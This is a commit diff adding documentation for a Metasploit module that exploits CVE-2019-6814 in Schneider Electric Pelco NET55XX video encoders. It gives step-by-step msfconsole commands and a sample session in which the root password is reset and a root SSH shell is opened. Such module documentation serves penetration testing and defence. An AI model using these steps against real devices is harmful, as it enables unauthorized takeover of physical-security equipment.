Land #12084, Add Schneider Encoder Exploit

documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md

@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+Schneider Electric Pelco NET55XX Encoder (CVE 2019-6814)
+
+Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550).
+This module exploits an inadequate access control vulnerability creating a malicious JSON request to the `webUI` encoder, thus allowing the SSH service to be enabled and changing the root password.
+
+## Verification Steps
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/schneider_electric_net55xx_encoder`
+- [ ] `set RHOSTS [rhosts]`
+- [ ] `set RPORT [rport]`
+- [ ] `set NEW_PASSWORD [new password]`
+- [ ] `exploit`
+- [ ] Verify you get a root shell
+
+## Options
+
+This module can be as simple as setting the `RHOST` and `NEW_PASSWORD` option, and you're ready to go.
+
+**NEW_PASSWORD**  
+
+You should set a new SSH password to the vulnerable device.
+
+## Scenarios
+
+**Schneider Electric Pelco Encoder NET5501-XT**
+
+msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2
+RHOSTS  => 192.168.34.2
+msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RPORT 80
+RPORT  => 80
+msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7
+NEW_PASSWORD => msfrapid7
+msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run
+
+[] 192.168.34.2:22 - Attempt to start a SSH connection...
+[] 192.168.34.2:80 - Attempt to change the root password...
+[+] 192.168.34.2:80 - Successfully changed the root password...
+[+] 192.168.34.2:22 - Session established
+[] Found shell.
+[] Command shell session 1 opened (192.168.34.3:37033 -> 192.168.34.2:22) at 2019-07-03 10:57:07 -0400
+
+uname -a;id
+Linux NET5501-XT-K61200103 2.6.37 #1 PREEMPT Fri Aug 8 04:33:08 KST 2014 armv7l unknown
+uid=0(root) gid=0(root) groups=0(root)